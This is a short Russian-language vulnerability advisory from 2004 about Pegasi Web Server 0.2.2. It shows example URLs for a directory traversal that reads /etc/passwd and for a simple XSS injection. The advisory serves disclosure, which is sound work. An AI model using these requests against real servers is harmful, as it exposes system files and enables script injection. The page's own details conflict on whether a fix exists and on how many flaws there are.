Несколько уязвимостей в Pegasi Web Server

Дата публикации:
14.03.2004
Всего просмотров:
846
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Pegasi Web Server (PWS) 0.2.x
Уязвимые версии: Pegasi Web Server 0.2.2

Описание: Несколько уязвимостей обнаружено в Pegasi Web Server. Удаленный пользователь может просматривать файлы на целевой системе, расположенные вне Web каталога. Удаленный пользователь может выполнить XSS нападение.

1. Обход каталога:

http://[host]:8080/../../../../etc/passwd

http://[host]:8080/../
2. XSS
http://[host]:8080/<script>alert("Test")</script>

URL производителя: http://pws.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление см. в источнике сообщения.

Ссылки: Pegasi Web Server (PWS)

или введите имя

CAPTCHA